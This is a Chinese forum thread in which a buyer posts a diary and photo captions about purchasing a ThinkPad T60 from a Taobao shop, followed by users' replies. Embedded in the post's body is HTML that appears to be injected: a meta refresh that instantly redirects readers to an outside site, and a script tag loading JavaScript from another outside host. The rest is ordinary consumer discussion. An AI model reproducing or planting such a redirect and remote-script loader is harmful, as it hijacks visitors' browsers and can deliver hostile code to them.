开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 购机日记+新机图展

4/28通过XY淘宝网站购买E79-T60, 用支付宝付款,活动一,加一内胆包。4/30到货,签收机器,两天测机,今天上图。::76::

感觉送的原装包不是06款的, 但我感觉比06的好很多。06的材质有点软,这个很不错。幸亏没有-60没要。::67::

我联系的是蒋先生,态度很好,本来要DN6,但不可保点了,蒋先生说E79下午到货,就要了这个。+512原厂内存组成双通道。只是不知道为什么CPU-Z, EVEREAST 中都测不出SPD的信息,还请斑竹解答。::83::

自己用提供的隐藏分区恢复盘做的系统,5。1 出去吃饭前开始,回来后就全装好了,大概3-4小时吧。::65::
用PM重新分区,20-68-20,后来R&R开机进不去。可能破坏了启动信息。好多人可能都这样吧。 告诉大家一个方法。 用R&R的第一张CD盘启动一下进入R&R, 然后RESTART, 取出CD, 就可以进入了。 还有其他的方法,但这个比较简单。

可以看出,T60 比IBM 的经典机 600E 还是要薄一些,但大一圈,要沉一点。

+300---tszmsid

<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

包裹图

包裹图

开包内图

开包内图

再开包

再开包

机器

机器

开盖

开盖

开盖

开盖

兄弟

兄弟

兄弟

兄弟

不能说兄弟了,差辈了

不能说兄弟了,差辈了

叔侄吧

叔侄吧

打CS还得用这个

打CS还得用这个

评分

tszmsid + 300

不错,不错!!!!!!!!!!!
eizo的显示器,牛!!!
感谢楼主分享,能够说说机子的感受吗
测不出来可能是软件版本太老了.也可能是硬件太新了.我们用HDTune测硬盘有时候就看不出详细信息
原帖由 liu94 于 2007-5-3 14:55 发表

呵呵,当时本来要买液晶,但为了CS, 还是CRT吧, 显示不错,就是太沉了, 19寸, 将近120斤呢。
原帖由 hcm5 于 2007-5-3 14:59 发表
感谢楼主分享,能够说说机子的感受吗

机子很不错, 我觉得XY的东西还是不错的。 我认为是能保证原厂原件的。
环境真的不错,太让人羡慕了
能够使用支付宝?
不错哈不错
原帖由 liu94 于 2007-5-3 14:55 发表

这个显示器哪里好啊,不懂,能说说么?
旁边那是X60吗,看不清楚啊。
不是X60 ,是IBM 600E, 曾经的经典。
EIZO, 专业显示器的品牌, 不过现在也开始做民用了。
现在只有做民用的
才真的能够赚更多的钱哈
我3号在淘宝网站购买T60-D64,由于放假的影响,10号可能才能收到!
我正好是5。1前一天收到,放假有东西玩了。
漂亮,很想有一台....
...........
请问一下下。。。
LZ共有几台?
600E太老了,只能用T60了。
羡慕

600e保养不错呢,买个二手吧

感觉lz也是痴迷小黑呢
好想来一台啊
羡慕啊,正在准备票子,现在用的是惠普,还好用,不急
请教LZ,600E左侧腕托intel inside边上是风扇还是音箱出音口?或者其他?